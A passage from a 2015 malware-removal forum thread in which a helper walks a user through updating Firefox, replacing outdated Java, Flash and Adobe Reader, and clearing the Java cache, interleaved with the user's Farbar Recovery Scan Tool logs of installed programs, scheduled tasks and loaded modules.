2014-07-13 20:35 - 2014-12-30 01:49 - 0007680 _____ () C:\Users\VIJAY\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\DSwitch.txt
2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\QSwitch.txt
2011-06-27 19:26 - 2011-06-27 19:26 - 0232496 ____R () C:\ProgramData\DeviceManager.xml.rc4
2014-06-15 15:04 - 2015-02-11 11:58 - 0000753 _____ () C:\ProgramData\hpqp.ini
2014-06-15 03:06 - 2014-12-30 00:41 - 0000178 _____ () C:\ProgramData\HPWALog.txt
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-25 05:59 - 2009-08-25 06:00 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-25 05:54 - 2009-08-25 05:56 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2014-06-15 15:04 - 2014-06-15 15:04 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-25 05:54 - 2009-08-25 05:54 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-25 05:56 - 2009-08-25 05:59 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-02-03 00:45

==================== End Of Log ============================

#4 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 11 February 2015 - 12:48 AM

I have Symantect Endpoint Protection version 11.0.6300.803

Antivirus and Antispyware Defintions are from 5 Jan 2015. I ran Liveupdate many times but it is not getting applied.

After scanning from FRST, addition.txt is also getting generated, do I need to post that as well?

Also, I have not cleaned anything after scanning from AdwCleaner....just generated the log and posted here....do I need to clean that also....there was only one thing that was found....it was Firefox cookie...please let me know.

Please let me know if anyother information is required.

#5 OCD

SuperHelper

Malware Team
5,574 posts

Posted 11 February 2015 - 01:07 AM

Hi vijay.gupta,

Update Firefox

In the upper left corner of your browser window click the Help menu.
Wait for the Help menu to expand, then click on About Firefox
A small window will open similar to the one below.

Click on the Update button as shown in the image above.
Allow Mozilla Firefox to update, reboot if instructed to do so.

=========================

Uninstall via Programs and Features

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:

Java 7 Update 60
Java SE Development Kit 7 Update 60
Adobe Flash Player 10
Adobe Reader 9

=========================

Adobe Flash Player:

Go to http://get.adobe.com...player/?no_ab=1

Remove the check mark from the box "Install Google Drive"
Click the Download button, and follow the onscreen directions to complete the installation.

Please note, depending on your settings, you may have to temporarily disable your antivirus software for the Adobe Reader update.

=========================

Adobe Reader:

Go to http://get.adobe.com.../otherversions/

Use the drop down menu's to select your operating system
Select your language > Select The current version of Adobe Reader for your language
Remove the check mark from the box "Free! McAfee Security Scan Plus"
Click the Download button, and follow the onscreen directions to complete the installation.

Please note, depending on your settings, you may have to temporarily disable your antivirus software for the Adobe Reader update.

=========================

Clear Java Cache

Locate the Java Control Panel

Click on the Start button and then click on the Control Panel option.
In the Control Panel Search enter "Java Control Panel".
Click on the Java icon to open the Java Control Panel.

Delete Temporary Files through the Java Control Panel

In the Java Control Panel, under the General tab, click Settings under the Temporary Internet Files section.
The Temporary Files Settings dialog box appears.

Click Delete Files on the Temporary Files Settings dialog.
The Delete Temporary Files dialog box appears.

Click OK on the Delete Temporary Files dialog.
Note: This deletes all the Downloaded Applications and Applets from the cache.
Click OK on the Temporary Files Settings dialog.
Note: If you want to delete a specific application and applet from the cache, click on View Application and View Applet options respectively.

=========================

Reboot

=========================

Try and update your anti-virus again. Post back the results.

Also, post the Addition.txt log

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

#6 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 11 February 2015 - 02:23 PM

Performed all the actions except Java Control Panel one as I couldn't find any. Also, I tried to update Antivirus but it is not getting updated now also.

Addition Log contents:

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-02-2015
Ran by VIJAY at 2015-02-11 12:06:03
Running from C:\Users\VIJAY\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Out of date) {63DF5164-9100-186D-2187-8DC619EFD8BF}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Out of date) {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Symantec Endpoint Protection (Enabled) {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\uTorrent) (Version: 3.4.2.37754 - BitTorrent Inc.)
Acrobat.com (HKLM\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
ActiveCheck component for HP Active Support Library (Version: 3.0.0.2 - Hewlett-Packard) Hidden
Ad-Aware (HKLM\...\Ad-Aware) (Version: - Lavasoft)
Ad-Aware (Version: 8.0.0 - Lavasoft) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 10.0.22.87 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\{AD72CFB4-C2BF-424E-9DF0-C7BAD1F30A11}) (Version: 11.0 - Adobe Systems, Inc.)
Alps Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: - ALPS ELECTRIC CO., LTD.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 3.20 - Piriform)
Check Point VPN (HKLM\...\{db6ec6e6-fe11-4edf-ab81-ef8b6917d628}) (Version: 75.20.0000 - CheckPoint)
CyberLink DVD Suite (HKLM\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
CyberLink YouCam (HKLM\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 2.0.3115 - CyberLink Corp.)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Google Chrome (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Google Chrome) (Version: 40.0.2214.111 - Google Inc.)
Google Talk Plugin (HKLM\...\{C77CC230-7417-3F01-B70D-52583DC9FEC9}) (Version: 5.40.2.0 - Google)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
HP Advisor (HKLM\...\{B53E61D7-7C80-40DF-82D2-CF5390D6D20A}) (Version: 3.2.8946.3086 - Hewlett-Packard)
HP Customer Experience Enhancements (HKLM\...\{5B295588-59C1-4386-9F85-BB4BEDCB0D22}) (Version: 5.7.0.3036 - Hewlett-Packard)
HP DVD Play 3.7 (HKLM\...\{45D707E9-F3C4-11D9-A373-0050BAE317E1}) (Version: 3.7.0.6623 - Hewlett-Packard)
HP Games (HKLM\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
HP Quick Launch Buttons (HKLM\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.4.1 - Hewlett-Packard)
HP Setup (HKLM\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM\...\{4F46FDB9-B906-47BF-B3D5-C62E01B3C5EE}) (Version: 4.1.11.3 - Hewlett-Packard)
HP Update (HKLM\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
HP User Guides 0146 (HKLM\...\{45E5D641-3C82-4F95-92FB-AE5459DF2988}) (Version: 1.02.0002 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
HPAsset component for HP Active Support Library (Version: 3.0.2.2 - Hewlett-Packard) Hidden
IDT Audio (HKLM\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6225.0 - IDT)
Java 7 Update 60 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
Java SE Development Kit 7 Update 60 (HKLM\...\{32A3A4F4-B792-11D6-A78A-00B0D0170600}) (Version: 1.7.0.600 - Oracle)
JMicron Flash Media Controller Driver (HKLM\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.32.1 - JMicron Technology Corp.)
join.me (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\JoinMe) (Version: 1.18.0.189 - LogMeIn, Inc.)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (Version: 2.5.1913 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM\...\{82EF29B1-9B60-4142-A155-0599216DD053}) (Version: 1.18.6.1 - LightScribe)
LiveUpdate 3.3 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.3.0.101 - Symantec Corporation)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
muvee Reveal (HKLM\...\{293F900D-3743-A8CC-46AD-5AFBFF8E29CF}) (Version: 7.0.40.10061 - muvee Technologies Pte Ltd)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Power2Go (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (Version: 5.5.1923 - CyberLink Corp.) Hidden
Q4Search version 1.0.1.5 (HKLM\...\{CB92E070-D5D3-4E84-8597-28BBBD66240D}_is1) (Version: 1.0.1.5 - Q For Search LTD)
QLBCASL (Version: 6.40.17.2 - Hewlett-Packard) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0005 - Realtek)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Reliance 3G (HKLM\...\{A9E5EDA7-2E6C-49E7-924B-A32B89C24A04}) (Version: 1.0.0.1 - ZTE Corporation)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Silent Install Builder (HKLM\...\{2452C59D-05CC-4A9A-A97F-B925390619E1}) (Version: 4.0.1 - APREL Technologies LLC)
SoftStylus (HKLM\...\{76D0B7D8-6683-4D54-A108-046A5E542F0B}) (Version: 2.2.103.0 - Motorola)
Sublime Text 2.0.2 (HKLM\...\Sublime Text 2_is1) (Version: - )
Symantec Endpoint Protection (HKLM\...\{AAE221D5-C3DD-4FE2-A063-C1368FE730A5}) (Version: 11.0.6300.803 - Symantec Corporation)
Tata Photon+ (HKLM\...\Tata Photon+) (Version: 11.030.01.28.628 - Huawei Technologies Co.,Ltd)
TTSL Olive CE310 Dialer (HKLM\...\{90C99F3E-56DB-4965-B524-1D0E1851E03A}) (Version: - )
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Vodafone Mobile Broadband Lite (HKLM\...\{6C29152D-3FF9-43B2-84E4-9B35FC0BF5C2}) (Version: 10.2.301.32820 - Vodafone)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
小米助手 (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MiPhoneManager) (Version: - 小米移动软件有限公司)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.25.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Chrome\Application\40.0.2214.111\delegate_execute.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.25.11\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\Users\VIJAY\AppData\Local\Temp\E07f88d\temp\S5830i_Modem_Files.zip.exe No File

==================== Restore Points =========================

28-01-2015 10:44:22 Windows Update
31-01-2015 10:45:27 ##IDS_ERROR_1715##
31-01-2015 10:55:07 Windows Update
05-02-2015 00:57:27 Windows Update
10-02-2015 02:11:34 Restore Operation
10-02-2015 11:24:27 Checkpoint by HitmanPro
10-02-2015 11:25:28 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 07:34 - 2009-06-11 03:09 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {019D1DDD-29E1-40FC-982D-167A13B56834} - System32\Tasks\HPCeeScheduleForVIJAY => C:\Program Files\hewlett-packard\sdp\ceement\HPCEE.exe [2009-05-27] (Hewlett-Packard)
Task: {14B76D68-AAA5-4BF0-8524-498D0421B0BC} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-09] ()
Task: {1608F6F0-771B-40F6-BE4B-9991BCAC4EA5} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\realupgrade.exe
Task: {2F951982-C7F0-4674-AE9E-007761776C27} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\realupgrade.exe
Task: {4AD09E1F-1059-4953-8C98-0454D25E2732} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-09] (Google Inc.)
Task: {4C4090C3-B695-49BF-86C6-92BBBDF8F5A7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2012-06-23] (Piriform Ltd)
Task: {578E3CCE-5896-49D9-B06F-71F93B631EED} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\recordingmanager.exe
Task: {5A3B6744-DB49-43FA-8D0D-4388FD537950} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-09] (Google Inc.)
Task: {6AA05B1F-A0BD-4CD2-A3D2-1A9C373A5346} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe
Task: {6B9310D7-1AE3-44A8-A432-9C067B03EA33} - System32\Tasks\{6144C679-CCF4-4AE5-9F85-5C8903B84ABA} => pcalua.exe -a C:\Users\VIJAY\Downloads\movies\Games\Cd\Setup.exe -d C:\Users\VIJAY\Downloads\movies\Games\Cd
Task: {7BD768F6-E7A3-43EF-8902-D867484ABA2A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2014-12-16] (Microsoft)
Task: {9485C386-9A32-4059-A42D-EFBF0AB544A1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {9E56CBDE-5BA9-4635-9933-016DC8745B29} - System32\Tasks\Ad-Aware Update (Weekly) => C:\Program Files\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe [2009-01-19] (Lavasoft)
Task: {BCDCD028-A3EB-4E2C-94B5-231FADF43587} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {C34E466E-4E24-42E8-8AE3-280D14678C65} - System32\Tasks\RecoveryCDWin7 => C:\Program Files\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-09] ()
Task: {CBA2E891-8163-482B-BBAC-5AB9920233C4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Ghost Resign Task => c:\program files\hewlett-packard\hp health check\activecheck\product_line\HPResignFileLoader.exe [2014-12-16] (Microsoft)
Task: {CC81148E-06A6-47A5-8EA6-9A200CB64A4E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {CF812C73-22FB-418C-8265-08EB0B4DF691} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-07-10] (Hewlett-Packard)
Task: {F3E45D06-4FBE-44A2-9926-F349E13FB121} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe
Task: {FBFBCEAD-E579-4878-9540-FAE1CA7BBA78} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-07-10] (Hewlett-Packard)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Ad-Aware Update (Weekly).job => C:\Program Files\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core.job => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA.job => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForVIJAY.job => C:\Program Files\hewlett-packard\sdp\ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) ==============

2014-06-19 01:12 - 2014-07-03 01:12 - 00107992 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 00207728 _____ () C:\Program Files\Lavasoft\Ad-Aware\RPAPI.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 01404256 _____ () C:\Program Files\Lavasoft\Ad-Aware\Resources.dll
2008-09-11 03:30 - 2008-09-11 03:30 - 00168960 _____ () C:\Program Files\Lavasoft\Ad-Aware\unrar.dll
2009-07-31 05:19 - 2009-07-31 05:19 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll
2014-07-05 13:51 - 2011-03-02 12:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 00079712 _____ () C:\Program Files\Lavasoft\Ad-Aware\ShellExt.dll
2010-11-16 19:07 - 2010-11-16 19:07 - 00264704 _____ () C:\ProgramData\DatacardService\HWDeviceService.exe
2009-08-25 05:59 - 2009-01-22 00:17 - 00247152 ____N () C:\Program Files\CyberLink\Shared files\RichVideo.exe
2014-09-27 15:54 - 2012-11-26 20:33 - 00275784 _____ () C:\Program Files\Reliance 3G\AssistantServices.exe
2011-09-14 23:11 - 2011-09-14 23:11 - 04993024 _____ () C:\Program Files\CheckPoint\Endpoint Connect\QtGui4.dll
2011-09-14 23:11 - 2011-09-14 23:11 - 01302528 _____ () C:\Program Files\CheckPoint\Endpoint Connect\QtCore4.dll
2011-09-14 23:11 - 2011-09-14 23:11 - 00028672 _____ () C:\Program Files\CheckPoint\Endpoint Connect\imageformats\qgif4.dll
2014-09-27 15:54 - 2012-11-26 20:34 - 00157000 _____ () C:\Program Files\Reliance 3G\UIExec.exe
2014-10-09 12:07 - 2014-09-27 23:18 - 05164792 _____ () C:\Q4SearchInstall\bin\Q4Search.exe
